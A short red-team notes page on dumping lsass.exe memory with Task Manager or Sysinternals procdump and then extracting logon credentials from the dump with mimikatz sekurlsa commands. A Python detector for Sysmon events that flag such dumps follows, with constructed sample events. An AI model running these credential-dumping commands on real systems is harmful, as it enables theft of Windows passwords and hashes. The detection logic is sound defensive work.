Dumping Lsass.exe to Disk and Extracting Credentials

Task Manager

Create a minidump of lsass.exe using Task Manager (Task Manager must be running as administrator):

Switch the mimikatz context to the minidump:

{% code-tabs %} {% code-tabs-item title="attacker@mimikatz" %}

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords
{% endcode-tabs-item %} {% endcode-tabs %}

Procdump

Procdump from Sysinternals could also be used to dump the process:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

procdump.exe -accepteula -ma lsass.exe lsass.dmp
{% endcode-tabs-item %} {% endcode-tabs %}
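
What both techniques above leave behind in endpoint telemetry, as an added example that is not part of the original notes: a small classifier over Sysmon-shaped events (Event ID 1 process creation, 10 process access, 11 file creation). The sample events are constructed, the `C:\Tools` path is hypothetical, and the three rules are assumptions about reasonable detection logic, not a vendor rule set.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory

# Constructed sample events shaped like Sysmon Event ID 1, 10 and 11.
# Paths under C:\Tools are hypothetical.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 10, "SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\ADMINI~1.OFF\AppData\Local\Temp\notepad.DMP"},
    {"EventID": 1, "Image": r"C:\Windows\System32\tasklist.exe",
     "CommandLine": 'tasklist /fi "imagename eq lsass.exe"'},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

FULL_DUMP_FLAG = re.compile(r"(?<!\S)-ma(?!\S)", re.IGNORECASE)  # procdump full dump
DUMP_NAME = re.compile(r"^lsass.*\.dmp$", re.IGNORECASE)         # e.g. lsass.DMP

def classify(event):
    """Return a finding string for an lsass-dump indicator, or None."""
    eid = event.get("EventID")
    if eid == 1:  # process creation: full-dump flag together with the lsass name
        cmd = event.get("CommandLine", "")
        if FULL_DUMP_FLAG.search(cmd) and "lsass" in cmd.lower():
            return "full-memory dump command line naming lsass"
    elif eid == 10:  # process access: handle to lsass that allows memory reads
        access = int(event.get("GrantedAccess", "0x0"), 16)
        target = basename(event.get("TargetImage", "")).lower()
        if target == "lsass.exe" and access & PROCESS_VM_READ:
            return "handle to lsass.exe opened with PROCESS_VM_READ"
    elif eid == 11:  # file creation: dump file named after lsass
        if DUMP_NAME.match(basename(event.get("TargetFilename", ""))):
            return "lsass dump file written to disk"
    return None

def scan(events):
    """Return (index, finding) for every event that matches a rule."""
    hits = ((i, classify(e)) for i, e in enumerate(events))
    return [(i, f) for i, f in hits if f]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

The process-access rule is the one that does not depend on file or tool names, but security products also open lsass.exe with read access, so in practice it needs an allowlist keyed on `SourceImage`.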